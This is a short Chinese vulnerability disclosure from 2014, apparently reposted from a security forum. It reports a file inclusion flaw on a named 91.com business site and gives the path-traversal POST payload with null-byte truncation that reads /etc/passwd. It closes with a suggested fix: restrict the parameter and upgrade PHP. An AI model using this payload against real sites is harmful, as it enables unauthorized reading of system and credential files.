91某业务站点存在文件包含漏洞下载

来源:黑吧安全网 浏览:455次 时间:2014-06-25
做网站找雨过天晴工作室

存在文件包含的站点:



http://diy.91.com



对http://diy.91.com/login.php 测试,无果。



通过目录遍历得到:

diy.91.com/tools/log/





post:logtype=../../../../../../../../../../etc/passwd%00.jpg

修复方案:

logtype参数进行限制,猜测应该是

include $_POST[logtype].".php" ..php被%00截断了。。你们的php版本较低。。可以的话做下升级吧。